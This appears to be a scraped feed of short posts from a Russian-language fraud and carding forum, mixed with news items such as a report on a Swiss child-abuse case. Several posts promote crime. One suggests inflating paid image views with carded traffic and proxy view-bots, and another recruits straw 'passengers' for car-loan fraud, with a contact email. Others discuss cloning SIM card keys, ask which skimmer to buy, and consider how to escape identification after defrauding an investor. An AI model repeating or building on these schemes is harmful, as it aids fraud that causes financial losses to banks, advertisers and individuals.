1 баллПривествую всех!Капался я на сайте одном,увидел такую тему: Сайт платит до 230 РУБ за 1000 уникальных просмотров! Зарабатывать можно на любых картинках которые вы пожелаете. Гид новичка от сайта: 1 шаг: Зарегистрируйтесь на сайте(тык) и войдите в личный кабинет. 2 шаг: Загрузите картинки которые вы планируете размещать на популярных сайтах. 3 шаг: Получите ссылки, коды картинок и разместите их на популярные сайты. 4 шаг: Чем больше картинок вы разместите, тем больше денег вы будете зарабатывать ежедневно. Вывод денег происходит каждый понедельник по достижении минимума 30 рублей. Для заработка подойдут такие сайты как vk.com, ok.ru, mail.ru Так же: большой выхлоп пойдет когда вы разместите свои картинки на торрент трекеры. А теперь вот решил доработать ее.Смотрите,а если мы эти просмотры накрутим)))),нагоним траффик на картинки,можно любым способом.Если на сайте,давайте остоновимся на этом.Можно скардить траффик,контор куча в гугле.Ну или можите заняться тем же арбитражем,где то видал даже за 100 отдают трафф,какбы ваши будут 130 прибыли).Включайте мозг главное. Дальше мысли,если в вк хотите ,делаем так:Можем нагнать просмотри за счет тех же Likest,Like4u,Если подумать можно много способов как нагнать трафф. Еще один способ.В гугле гуляет софтинка,которая нагоняет просмотры с разных прокси,можите и ее по крутить. Ну вот есть у вас направление о чем думать)спасибо всем))
-
1 баллМеждународная платежная система Visa официально заявила о том, что ее карточки продолжат работать в России при любом развитии событий после 1 апреля, когда обработка операций по ее картам будет передана в Национальную систему платежных карт. "Мы подтверждаем, что все внутрироссийские трансакции по картам Visa будут обрабатываться и после 1 апреля 2015 года в соответствии с законодательством",— сообщила вчера Visa. Итогом совместной работы с Национальной системой платежных карт (НСПК) и ЦБ, по заявлению компании, должен стать перевод процессинга с минимальными последствиями, "чтобы держатели не заметили изменений в работе карт". Таким образом Visa отреагировала на вопросы, поступающие, по сведениям газеты "Коммерсант", и в ЦБ, и в НСПК от представителей банков о том, как продолжат функционировать карты международных систем, если процессинг не будет передан в НСПК до 1 апреля. Visa договорилась о сотрудничестве с НСПК лишь 19 февраля, и о том, что НСПК уже начала обработку трансакций по ее картам хотя бы по минимальному набору банков, пока не объявлялось. Если Visa не локализует процессинг, ей полагалось бы разместить в ЦБ большой страховой депозит, против чего компания выступала в течение всего прошлого года.
-
1 балл
-
1 баллРелиз Windows 10 намечен на 2015 год, так что ждать осталось совсем недолго :-D
-
1 баллНужны пассажиры под автокредиты 27+ Москва/МО. Ки без задолжностей.ИНН и тд Все документы с меня и организация с меня,с вас пассажир О процентах договоримся Связь только через почту : keniziko@gmail.com
-
1 баллЛично моё мнение насчёт пахотных земель такое: слишком слабенькое у нас сельское хозяйство, да и цены на такую землю дармовые. Я думаю, особого роста в ближайшее время точно не будет. Мало кто хочет продавать за "копьё" выработанную продукцию, вследствие чего и окупаемость маленькая и напряжно.
-
1 баллМое мнение - сдавать в аренду и не морочить голову. Но арендаторов контролировать чтобы помещение не угробили. Составить грамотный договор. Продать легче всего, но это имеет смысл, если потом вложиться в другой бизнес.
-
1 балл
-
1 балл2pay- это белорусский мерч... Работает он с минидепами и кто давно работает с онлайн-играми давно его дрочат. Так что вывод делайте сами.
-
1 балл
-
1 балл
-
1 баллтолько тут конкретное палево, личной встречи с инвестором не избежать, соответственно засветишь лицо, а когда кинешь будут усиленно искать и лицо будет висеть во всех отделениях полиции
-
1 баллТут есть люди кто реально юзал эту тему? Все как то поверхнастно расписано, хочется конкретно услышать какую модель приобрести и в путь на снятие инфы.......
-
1 баллШвейцарские следователи собрали обширную доказательную базу по делу о педофиле из органов опеки. Врач-терапевт на протяжении трех десятков лет насиловал подростков и юношей с психическими и физическими отклонениями. Среди жертв извращенца оказалась даже новорожденная девочка. Общее число потерпевших превысило сотню, сообщает телекомпания CNN. 54-летний гражданин Швейцарии из района Оберланд в кантоне Берн признался в том, что в течение многих лет растлевал воспитанников интернатов и детских домов, где он занимал должности соцработника, передает телерадиокомпания BBC. По данным прокуратуры, за 30 лет его жертвами стали 122 ребенка: подозреваемому инкриминируют 114 случаев действий сексуального характера в отношении несовершеннолетних, а также 8 эпизодов домогательств. С 1982 года педофил успел поработать в должности врача-терапевта в девяти заведениях социальной сферы, семь из которых находятся под Берном, а один из интернатов расположен даже не в Швейцарии, а Германии, передает Reuters. Расследование началось после того, как на соцработника пожаловались двое из потерпевших. Но к настоящему моменту в руки полиции попали даже фотографии и видеозаписи сексуальных надругательств эскулапа. "Один из главных вопросов следствия - каким образом столь масштабные (случаи) домогательства могли так долго оставаться незамеченными", - заявила глава следственного отделения полиции Берна Габриэль Берже. Удивительно и то, что в 2003 году подозреваемый уже находился под следствием по подозрению в развратных действиях. Тогда на социального работника пожаловалась 13-летняя девочка-инвалид. Однако дело закрыли из-за противоречий в показаниях свидетелей. Теперь полиция намерена вернуться к этому криминальному эпизоду вновь. Арестовали педофила-соцработника в апреле 2010 года, когда в полицию обратились родители двух юношей-инвалидов, живущих в интернате под Берном. Пострадавшие рассказали взрослым, что имели сексуальный контакт с подозреваемым. После ареста соцработник стал активно сотрудничать со следствием, и к настоящему времени выявлены десятки криминальных эпизодов. Большинство жертв извращенца являются мальчиками, однако иногда он насиловал и девочек. Все жертвы имели психические отклонения, а некоторые и физически отличались от своих сверстников. 42 потерпевших на момент преступления уже достигли совершеннолетия. Как утверждают следователи, подозреваемый совершал развратные действия даже в отношении детей некоторых своих коллег, а самой маленькой девочке на момент надругательства исполнился всего один год. Установлено, что развратник дотрагивался до половых органов жертв, а также принуждал их к оральному сексу, пишет Oneindia News со ссылкой на швейцарскую газету Tribune de Geneve. По словам подозреваемого, иногда он совершал несколько изнасилований в день. А в восемнадцати эпизодах он снимал происходящее на видеокамеру и делал фотографии. Впрочем, в полиции считают, что эти видеоматериалы преступник делал лишь для себя, и в интернете они не распространялись. Добавим, что по большинству эпизодов нет никакой возможности привлечь преступника к уголовной ответственности за давностью лет, однако арестованному все-таки можно будет инкриминировать 33 случая надругательства.
-
1 балл
-
1 балллично не видел, но.. брат занимается продажей сим карт в Беларуси, есть отдельные индивидуумы, которые скупают данные девайсы и перенаправляют в Польшу, Украину & etc все знают, что 128-ые легко сканируются, но, поверьте, у "фродоопастных" операторов (таковой у нас один) такого щифрования уже давно нет. т.е. это вполне современные симки, с очень сложным алгоритмом и кер пойми как, но они их ломают и выставляют многомиллионные счета.. весьма, весьма интересно, ведь в каждой "шутке есть доля шутки". так что может и неправдаподобно звучит, но KI с новых симок уходит только так. факт.
-
1 баллПообщался с человечком, не могу понять в чем подлог МЕНТ или РАЗВОД. Цитата письма (часть): "Залог осуществляется через американскую международную систему переводов Вестерн-Юнион. Залог вы вносите,сканируете квитанцию о переводе денежных средств,но при отправлении ее нам полностью закрываете все данные отправителя (фамилию,имя,отчество,город,страну,сумму и контрольный номер перевода (МТСН),без которого невозможно снять наличные)для вашей гарантии(оставляете только дату на скане что бы мы видели,что вы действительно его отправили) и даете их нам ТОЛЬКО ПРИ ПОЛУЧЕНИИ И ОБНАЛИЧИВАНИИ ВСЕХ НАШИХ..." st2010 вне форума Ответить с цитированием
-
1 баллужесточения по травматам растут, но стрельбы становится всё больше. не пора ли уже просто продавать оружие огнестрельное, по предъявлению паспорта и мед.справки? к чему этот цирк!
-
1 балл